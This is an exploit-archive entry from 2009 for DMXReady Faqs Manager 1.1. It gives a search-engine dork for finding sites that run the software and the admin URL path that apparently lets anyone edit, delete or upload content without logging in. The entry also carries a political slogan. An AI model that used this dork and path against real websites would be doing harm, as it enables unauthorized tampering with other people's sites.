id: 4662
date: 01/14/2009
title: DMXReady Faqs Manager <= 1.1 Remote Contents Change Vulnerability
author: ajann
cves: 

=================================================================
DMXReady Faqs Manager <= 1.1 Remote Contents Change Vulnerability
=================================================================


*******************************************************************************
# Title   :  DMXReady Faqs Manager <= 1.1 Remote Contents Change Vulnerability
# Author  :  "ajann" from Turkey
# Contact :   :( 
# S.Page  :  http://www.dmxready.com
# $$      :  24.97 $
# Dork    :  inurl:inc_faqsmanager.asp
# DorkEx  :
http://www.google.com.tr/search?hl=tr&q=inurl%3Ainc_faqsmanager.asp&meta=

****Stop Attack ABD and ISRAEL !


*******************************************************************************

Permissions:
Update
Delete
Insert Category / Sub Category
Image Upload

# http://[target]/[path]//admin/FaqsManager/add_category.asp

Example: 
You Find -> http://[target]/[path]//applications/FaqsManager/inc_faqsmanager.asp
Edit  ->    http://[target]/[path]//admin/FaqsManager/add_category.asp

 :)



#  0day.today [2023-03-22]  #